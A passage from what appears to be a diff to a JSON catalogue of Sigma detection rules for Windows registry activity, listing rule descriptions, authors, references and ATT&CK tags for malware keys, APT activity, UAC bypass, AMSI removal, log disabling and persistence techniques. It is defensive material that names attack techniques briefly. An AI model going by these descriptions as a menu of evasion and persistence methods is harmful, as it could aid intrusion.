"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_mal_netwire.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "1d218616-71b0-4c40-855b-9dbe75510f7f", + "value": "NetWire RAT Registry Key" + }, + { + "description": "Detects new registry key created by Ursnif malware.", + "meta": { + "author": "megan201296", + "creation_date": "2019/02/13", + "falsepositive": [ 
+ "Unknown" + ], + "filename": "registry_add_mal_ursnif.yml", + "level": "high", + "logsource.category": "registry_add", + "logsource.product": "windows", + "refs": [ + "https://blog.yoroi.company/research/ursnif-long-live-the-steganography/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_mal_ursnif.yml" + ], + "tags": [ + "attack.execution", + "attack.t1112" + ] + }, + "uuid": "21f17060-b282-4249-ade0-589ea3591558", + "value": "Ursnif" + }, + { + "description": "Detects COM object hijacking via TreatAs subkey", + "meta": { + "author": "Kutepov Anton, oscd.community", + "creation_date": "2019/10/23", + "falsepositive": [ + "Maybe some system utilities in rare cases use linking keys for backward compatibility" + ], + "filename": "registry_add_persistence_key_linking.yml", + "level": "medium", + "logsource.category": "registry_add", + "logsource.product": "windows", + "refs": [ + "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_persistence_key_linking.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.015" + ] + }, + "uuid": "9b0f8a61-91b2-464f-aceb-0527e0a45020", + "value": "Windows Registry Persistence COM Key Linking" + }, + { + "description": "Detects the of the \"accepteula\" key related to sysinternals tools being created from non sysinternals tools", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/24", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_add_renamed_sysinternals_eula_accepted.yml", + "level": "high", + "logsource.category": "registry_add", + "logsource.product": "windows", + "refs": [ + "Internal Research", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_renamed_sysinternals_eula_accepted.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588.002" + ] + }, + "uuid": "f50f3c09-557d-492d-81db-9064a8d4e211", + "value": "Usage of Renamed Sysinternals Tools" + }, + { + "description": "Detects the usage of Suspicious Sysinternals Tools such as PsExec, Procdump...etc via the \"accepteula\" key being added to Registry", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/24", + "falsepositive": [ + "Legitimate use of SysInternals tools" + ], + "filename": "registry_add_susp_sysinternals_eula_accepted.yml", + "level": "medium", + "logsource.category": "registry_add", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Moti_B/status/1008587936735035392", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_susp_sysinternals_eula_accepted.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588.002" + ] + }, + "uuid": "c7da8edc-49ae-45a2-9e61-9fd860e4e73d", + "value": "Usage of Suspicious Sysinternals Tools" + }, + { + "description": "Detects the usage of Sysinternals Tools due to accepteula key being added to Registry", + "meta": { + "author": "Markus Neis", + "creation_date": "2017/08/28", + "falsepositive": [ + "Legitimate use of SysInternals tools", + "Programs that use the same Registry Key" + ], + "filename": "registry_add_sysinternals_eula_accepted.yml", + "level": "low", + "logsource.category": "registry_add", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Moti_B/status/1008587936735035392", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_sysinternals_eula_accepted.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588.002" + ] + }, + "uuid": "25ffa65d-76d8-4da5-a832-3f2b0136e133", + "value": "Usage of Sysinternals Tools - 
Registry" + }, + { + "description": "A General detection to trigger for the creation or modification of .*\\Software\\Sysinternals\\SDelete registry keys. Indicators of the use of Sysinternals SDelete tool.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_add_sysinternals_sdelete_registry_keys.yml", + "level": "medium", + "logsource.category": "registry_add", + "logsource.product": "windows", + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/9", + "https://threathunterplaybook.com/evals/apt29/detections/4.B.2_59A9AC92-124D-4C4B-A6BF-3121C98677C3.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_sysinternals_sdelete_registry_keys.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ] + }, + "uuid": "9841b233-8df8-4ad7-9133-b0b4402a9014", + "value": "Sysinternals SDelete Registry Keys" + }, + { + "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence.\nThe disk cleanup manager is part of the operating system. 
It displays the dialog box […]\nThe user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Legitimate new entry added by windows" + ], + "filename": "registry_set_disk_cleanup_handler_new_entry_persistence.yml", + "level": "medium", + "logsource.category": "registry_add", + "logsource.product": "windows", + "refs": [ + "https://persistence-info.github.io/Data/diskcleanuphandler.html", + "https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_set_disk_cleanup_handler_new_entry_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "d4f4e0be-cf12-439f-9e25-4e2cdcf7df5a", + "value": "Persistence Via Disk Cleanup Handler - NewEntry" + }, + { + "description": "Detects the removal of folders from the \"ProtectedFolders\" list of of exploit guard. 
Which could indicate an attacker trying to launch an encryption process", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/05", + "falsepositive": [ + "Legitimate administrators removing applications (should always be monitored)" + ], + "filename": "registry_delete_exploit_guard_protected_folders.yml", + "level": "high", + "logsource.category": "registry_delete", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_exploit_guard_protected_folders.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "272e55a4-9e6b-4211-acb6-78f51f0b1b40", + "value": "Removal Of Folder From ProtectedFolders In Exploit Guard" + }, + { + "description": "Detects the deletion of registry keys containing the MSTSC connection history", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/10/19", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_delete_mstsc_history_cleared.yml", + "level": "high", + "logsource.category": "registry_delete", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer", + "http://woshub.com/how-to-clear-rdp-connections-history/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_mstsc_history_cleared.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070", + "attack.t1112" + ] + }, + "uuid": "07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", + "value": "Terminal Server Client Connection History Cleared" + }, + { + "description": "Remove the AMSI Provider registry key in HKLM\\Software\\Microsoft\\AMSI to disable AMSI inspection", + "meta": { + "author": "frack113", 
+ "creation_date": "2021/06/07", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_delete_removal_amsi_registry_key.yml", + "level": "high", + "logsource.category": "registry_delete", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://seclists.org/fulldisclosure/2020/Mar/45", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "41d1058a-aea7-4952-9293-29eaaf516465", + "value": "Removal Of Amsi Provider Reg Key" + }, + { + "description": "A General detection to trigger for processes removing .*\\shell\\open\\command registry keys. Registry keys that might have been used for COM hijacking activities.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "Legitimate software (un)installations are known to cause some false positives. 
Please add them as a filter when encountered" + ], + "filename": "registry_delete_removal_com_hijacking_registry_key.yml", + "level": "medium", + "logsource.category": "registry_delete", + "logsource.product": "windows", + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/7", + "https://threathunterplaybook.com/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.html", + "https://docs.microsoft.com/en-us/windows/win32/shell/launch", + "https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand", + "https://docs.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "96f697b0-b499-4e5d-9908-a67bec11cdb6", + "value": "Removal of Potential COM Hijacking Registry Keys" + }, + { + "description": "Detects when the \"index\" value of a scheduled task is removed or deleted from the registry. 
Which effectively hides it from any tooling such as \"schtasks /query\"", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/26", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_delete_removal_index_value_scheduled_task_hide.yml", + "level": "medium", + "logsource.category": "registry_delete", + "logsource.product": "windows", + "refs": [ + "https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_index_value_scheduled_task_hide.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ] + }, + "uuid": "526cc8bc-1cdc-48ad-8b26-f19bff969cec", + "value": "Removal Of Index Value to Hide Schedule Task" + }, + { + "description": "Remove SD (Security Descriptor) value in \\Schedule\\TaskCache\\Tree registry hive to hide schedule task. This technique is used by Tarrask malware", + "meta": { + "author": "Sittikorn S", + "creation_date": "2022/04/15", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_delete_removal_sd_value_scheduled_task_hide.yml", + "level": "medium", + "logsource.category": "registry_delete", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_sd_value_scheduled_task_hide.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ] + }, + "uuid": "acd74772-5f88-45c7-956b-6a7b36c294d2", + "value": "Removal Of SD Value to Hide Schedule Task" + }, + { + "description": "Sysmon registry detection of a local hidden user account.", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/05/03", + "falsepositive": [ + "Unknown" + ], + "filename": 
"registry_event_add_local_hidden_user.yml", + "level": "high", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1387530414185664538", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_add_local_hidden_user.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.001" + ] + }, + "uuid": "460479f3-80b7-42da-9c43-2cc1d54dbccd", + "value": "Creation of a Local Hidden User Account by Registry" + }, + { + "description": "Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018", + "meta": { + "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2018/03/23", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_event_apt_chafer_mar18.yml", + "level": "critical", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_chafer_mar18.yml" + ], + "tags": [ + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", + "attack.defense_evasion", + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" + ] + }, + "uuid": "7bdf2a7c-3acc-4091-9581-0a77dad1c5b5", + "value": "Chafer Activity - Registry" + }, + { + "description": "Detects registry key used by Leviathan APT in Malaysian focused campaign", + "meta": { + "author": "Aidan Bracher", + "creation_date": "2020/07/07", + "falsepositive": "No established falsepositives", + "filename": "registry_event_apt_leviathan.yml", + "level": "critical", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_leviathan.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "70d43542-cd2d-483c-8f30-f16b436fd7db", + "value": "Leviathan Registry Key Activity" + }, + { + "description": "Detects registry keys created in OceanLotus (also known as APT32) attacks", + "meta": { + "author": "megan201296, Jonhnathan Ribeiro", + "creation_date": "2019/04/14", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_event_apt_oceanlotus_registry.yml", + "level": "critical", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + "https://github.com/eset/malware-ioc/tree/master/oceanlotus", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_oceanlotus_registry.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "4ac5fc44-a601-4c06-955b-309df8c4e9d4", + "value": "OceanLotus Registry Activity" + }, + { + "description": "Detects Pandemic Windows Implant", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/06/01", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_event_apt_pandemic.yml", + "level": "critical", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://wikileaks.org/vault7/#Pandemic", + "https://twitter.com/MalwareJake/status/870349480356454401", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_pandemic.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1105" + ] + }, + "uuid": "47e0852a-cf81-4494-a8e6-31864f8c86ed", + "value": "Pandemic Registry Key" + }, + { + "description": "Unfixed method for UAC bypass from windows 10. WSReset.exe file associated with the Windows Store. 
It will run a binary file contained in a low-privilege registry.", + "meta": { + "author": "oscd.community, Dmitry Uchakin", + "creation_date": "2020/10/07", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_event_bypass_via_wsreset.yml", + "level": "high", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly", + "https://lolbas-project.github.io/lolbas/Binaries/Wsreset", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_bypass_via_wsreset.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "6ea3bf32-9680-422d-9f50-e90716b12a66", + "value": "UAC Bypass Via Wsreset" + }, + { + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "meta": { + "author": "Nik Seetharaman", + "creation_date": "2018/07/16", + "falsepositive": [ + "Legitimate CMSTP use (unlikely in modern enterprise environments)" + ], + "filename": "registry_event_cmstp_execution_by_registry.yml", + "level": "high", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_cmstp_execution_by_registry.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" + ] + }, + "uuid": "b6d235fc-1d38-4b12-adbe-325f06728f37", + "value": "CMSTP Execution Registry Event" + }, + { + "description": "Detects the addition of a key 'MiniNt' to the registry. 
Upon a reboot, Windows Event Log service will stopped write events.", + "meta": { + "author": "Ilyas Ochkov, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_event_disable_security_events_logging_adding_reg_key_minint.yml", + "level": "high", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/0gtweet/status/1182516740955226112", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_disable_security_events_logging_adding_reg_key_minint.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1112" + ] + }, + "uuid": "919f2ef0-be2d-4a7a-b635-eb2b41fde044", + "value": "Disable Security Events Logging Adding Reg Key MiniNt" + }, + { + "description": "Detects potential malicious modification of the property value of IsCredGuardEnabled from\nHKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\nThis is usually used with UseLogonCredential to manipulate the caching credentials.\n", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2019/08/25", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_event_disable_wdigest_credential_guard.yml", + "level": "high", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://teamhydra.blog/2020/08/25/bypassing-credential-guard/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_disable_wdigest_credential_guard.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "1a2d6c47-75b0-45bd-b133-2c0be75349fd", + "value": "Wdigest CredGuard Registry Modification" + }, + { + "description": "Detects the volume shadow copy service initialization and processing via esentutl. 
Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/10/20", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_event_esentutl_volume_shadow_copy_service_keys.yml", + "level": "high", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ] + }, + "uuid": "5aad0995-46ab-41bd-a9ff-724f41114971", + "value": "Esentutl Volume Shadow Copy Service Keys" + }, + { + "description": "Detects the use of Windows Credential Editor (WCE)", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/12/31", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_event_hack_wce_reg.yml", + "level": "critical", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://www.ampliasecurity.com/research/windows-credentials-editor/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_hack_wce_reg.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0005" + ] + }, + "uuid": "a6b33c02-8305-488f-8585-03cb2a7763f2", + "value": "Windows Credential Editor Registry" + }, + { + "description": "Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2021/04/12", + "falsepositive": [ + "Unknown" 
+ ], + "filename": "registry_event_hybridconnectionmgr_svc_installation.yml", + "level": "high", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Cyb3rWard0g/status/1381642789369286662", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_hybridconnectionmgr_svc_installation.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1608" + ] + }, + "uuid": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", + "value": "HybridConnectionManager Service Installation - Registry" + }, + { + "description": "Detects the presence of a registry key created during Azorult execution", + "meta": { + "author": "Trent Liffick", + "creation_date": "2020/05/08", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_event_mal_azorult.yml", + "level": "critical", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/trojan.win32.azoruit.a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mal_azorult.yml" + ], + "tags": [ + "attack.execution", + "attack.t1112" + ] + }, + "uuid": "f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", + "value": "Registry Entries For Azorult Malware" + }, + { + "description": "Detects FlowCloud malware from threat group TA410.", + "meta": { + "author": "NVISO", + "creation_date": "2020/06/09", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_event_mal_flowcloud.yml", + "level": "critical", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mal_flowcloud.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1112" + ] + }, + 
"uuid": "5118765f-6657-4ddb-a487-d7bd673abbf1", + "value": "FlowCloud Malware" + }, + { + "description": "Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527", + "meta": { + "author": "Markus Neis, @markus_neis, Florian Roth", + "creation_date": "2021/07/04", + "falsepositive": [ + "Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)" + ], + "filename": "registry_event_mimikatz_printernightmare.yml", + "level": "critical", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/gentilkiwi/mimikatz/commit/c21276072b3f2a47a21e215a46962a17d54b3760", + "https://www.lexjansen.com/sesug/1993/SESUG93035.pdf", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mimikatz_printernightmare.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204", + "cve.2021.1675", + "cve.2021.34527" + ] + }, + "uuid": "ba6b9e43-1d45-4d3c-a504-1043a64c8469", + "value": "PrinterNightmare Mimimkatz Driver Name" + }, + { + "description": "Detects value modification of registry key containing path to binary used as screensaver.", + "meta": { + "author": "Bartlomiej Czyz @bczyz1, oscd.community", + "creation_date": "2020/10/11", + "falsepositive": [ + "Legitimate modification of screensaver" + ], + "filename": "registry_event_modify_screensaver_binary_path.yml", + "level": "medium", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", + "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_modify_screensaver_binary_path.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.002" + ] + }, + "uuid": "67a6c006-3fbe-46a7-9074-2ba3b82c3000", + "value": "Path To Screensaver Binary Modified" + }, + { + "description": "Detects abusing Windows 10 Narrator's Feedback-Hub", + "meta": { + "author": "Dmitriy Lifanov, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_event_narrator_feedback_persistance.yml", + "level": "high", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_narrator_feedback_persistance.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "f663a6d9-9d1b-49b8-b2b1-0637914d199a", + "value": "Narrator's Feedback-Hub Persistence" + }, + { + "description": "Detects NetNTLM downgrade attack", + "meta": { + "author": "Florian Roth, wagga", + "creation_date": "2018/03/20", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_event_net_ntlm_downgrade.yml", + "level": "high", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_net_ntlm_downgrade.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1112" + ] + }, + "uuid": "d67572a0-e2ec-45d6-b8db-c100d14b8ef2", + "value": "NetNTLM Downgrade Attack - Registry" + }, + { + "description": "Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to 
obtain persistence and privilege escalation\nby causing a malicious DLL to be loaded and run in the context of separate processes on the computer.\n", + "meta": { + "author": "Ilyas Ochkov, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_event_new_dll_added_to_appcertdlls_registry_key.yml", + "level": "medium", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "http://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/", + "https://eqllib.readthedocs.io/en/latest/analytics/14f90406-10a0-4d36-a672-31cabe149f2f.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_new_dll_added_to_appcertdlls_registry_key.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.009" + ] + }, + "uuid": "6aa1d992-5925-4e9f-a49b-845e51d1de01", + "value": "New DLL Added to AppCertDlls Registry Key" + }, + { + "description": "DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll", + "meta": { + "author": "Ilyas Ochkov, oscd.community, Tim Shelton", + "creation_date": "2019/10/25", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_event_new_dll_added_to_appinit_dlls_registry_key.yml", + "level": "medium", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/822dc4c5-b355-4df8-bd37-29c458997b8f.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_new_dll_added_to_appinit_dlls_registry_key.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.010" + ] + }, + "uuid": "4f84b697-c9ed-4420-8ab5-e09af5b2345d", + "value": "New DLL Added to AppInit_DLLs Registry Key" + }, + { + "description": "Detects the addition of office 
test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started", + "meta": { + "author": "omkar72", + "creation_date": "2020/10/25", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_event_office_test_regadd.yml", + "level": "medium", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://attack.mitre.org/techniques/T1137/002/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_office_test_regadd.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1137.002" + ] + }, + "uuid": "3d27f6dd-1c74-4687-b4fa-ca849d128d1c", + "value": "Office Application Startup - Office Test" + }, + { + "description": "Detects persistence registry keys for Recycle Bin", + "meta": { + "author": "frack113", + "creation_date": "2021/11/18", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_event_persistence_recycle_bin.yml", + "level": "high", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/vxunderground/VXUG-Papers/blob/751edb8d50f95bd7baa730adf2c6c3bb1b034276/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf", + "https://persistence-info.github.io/Data/recyclebin.html", + "https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_persistence_recycle_bin.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547" + ] + }, + "uuid": "277efb8f-60be-4f10-b4d3-037802f37167", + "value": "Registry Persistence Mechanisms in Recycle Bin" + }, + { + "description": "Detects the modification of PortProxy registry key which is used for port forwarding. 
